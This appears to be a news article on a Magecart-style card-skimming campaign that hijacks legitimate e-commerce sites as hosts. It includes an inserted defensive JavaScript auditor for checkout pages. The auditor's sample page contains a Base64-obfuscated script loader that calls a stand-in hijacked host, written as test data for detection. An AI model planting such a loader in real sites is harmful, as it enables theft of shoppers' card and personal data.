Magento, WooCommerce, WordPress, and Shopify Exploited in Web Skimmer Attack

June 5, 2023 | Ravi Lakshmanan | Website Security / Magecart

Cybersecurity researchers have discovered a new Magecart-style web skimmer campaign in the works aimed at stealing personally identifiable information (PII) and credit card data from e-commerce websites.

A notable difference from other Magecart campaigns is that the hijacked site also acts as a “makeshift” command and control (C2) server, using its cover to facilitate the distribution of malicious code without the victim site’s knowledge.

Web security firm Akamai said it has identified victims of varying sizes in North America, Latin America and Europe, potentially putting the personal data of thousands of site visitors at risk of being collected and sold for illicit gain.

“Attackers use many evasion techniques during the campaign, such as obfuscation [using] Base64 and masking the attack to mimic popular third-party services such as Google Analytics and Google Tag Manager,” said Roman Lvovsky, a security researcher at Akamai.

The idea in a nutshell is to compromise legitimate vulnerable sites and use them to host web skimmer code, thereby leveraging the good reputation of legitimate domains. In some cases, the attacks have lasted nearly a month.

“Instead of using the attacker’s own C2 servers to host malicious code, which could be flagged as a malicious domain, attackers hack vulnerable legitimate sites, such as small and medium-sized retail websites, and hide the code within them,” Akamai said.

Attacks result in two types of victims: legitimate sites compromised to act as “distribution centers” for malware, and vulnerable e-commerce websites targeted by skimmers.

In some cases, a website not only becomes a victim of data theft, but can also unknowingly serve as a vehicle for spreading malware to other susceptible websites.

“This attack included exploits for Magento, WooCommerce, WordPress and Shopify, revealing a growing range of vulnerabilities and exploits for digital commerce platforms,” said Lvovsky.

This technique leverages the established trust websites have earned over time to create a “smoke screen” that makes it difficult to identify and respond to such attacks.

This campaign also employs other methods to avoid detection. This includes disguising the skimmer code as third-party services such as Google Tag Manager or Facebook Pixel to hide its true intentions.

Another trick employed is a JavaScript code snippet that acts as a loader and fetches the full attack code from the host victim’s website, minimizing the footprint and likelihood of detection.
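The two disguises described above (vendor-looking script names and Base64-encoded loader URLs) can be checked for on a site's own checkout page. The following is an added example for defenders, not code from Akamai or from the article; the allowlist, the shop.example and hijacked-store.example hosts, and the sample page are constructed assumptions. It runs under Node.js.

```javascript
// Added example. Hosts below are a constructed allowlist: the shop itself plus
// the hosts the real Google Tag Manager, Google Analytics and Facebook Pixel load from.
const ALLOWED_HOSTS = new Set(["shop.example", "www.googletagmanager.com",
  "www.google-analytics.com", "connect.facebook.net"]);
const VENDOR_MARKERS = /gtm|gtag|analytics|fbevents/i;

function hostOf(url, base) {
  try { return new URL(url, base).hostname; } catch { return null; }
}

// Base64 string literals in `code` that decode to an absolute or protocol-relative URL.
function decodedUrls(code) {
  const urls = [];
  for (const [, lit] of code.matchAll(/["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g)) {
    const text = Buffer.from(lit, "base64").toString("latin1");
    if (/^(https?:)?\/\/[\w.-]+/.test(text)) urls.push(text);
  }
  return urls;
}

function auditScripts(html, pageUrl) {
  const findings = [];
  for (const [, attrs, body] of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs)?.[1];
    if (src) {  // external script: vendor-looking name served from a non-vendor host
      const host = hostOf(src, pageUrl);
      if (!ALLOWED_HOSTS.has(host) && VENDOR_MARKERS.test(src))
        findings.push({ kind: "vendor-lookalike", host, evidence: src });
      continue;
    }
    for (const url of decodedUrls(body)) {  // inline script: encoded remote URL
      const host = hostOf(url, pageUrl);
      if (!ALLOWED_HOSTS.has(host))
        findings.push({ kind: "base64-url", host, evidence: url });
    }
  }
  return findings;
}

// Constructed sample page: one genuine tag, one first-party script, two suspicious ones.
const encoded = Buffer.from("https://cdn.hijacked-store.example/t.js").toString("base64");
const SAMPLE_PAGE = `
<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="/js/cart.js"></script>
<script src="https://static.hijacked-store.example/gtm.js?id=GTM-XXXX"></script>
<script>var s=document.createElement("script");s.src=atob("${encoded}");</script>`;

console.log(auditScripts(SAMPLE_PAGE, "https://shop.example/checkout"));
```

Because the campaign hosts its code on reputable hijacked domains, a finding here means "not on this page's allowlist", not "known bad"; a script without a vendor-style name from an unlisted host is not flagged by this check.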

There are two different variants of the obfuscated skimmer code, which has the ability to intercept and exfiltrate PII and credit card details as encoded strings through HTTP requests to attacker-controlled servers.

“Exfiltration only happens once per user who checks out,” said Lvovsky. “When a user’s information is stolen, the script flags the browser to prevent the information from being stolen twice (to reduce suspicious network traffic). This makes this Magecart-style attack more evasive.”
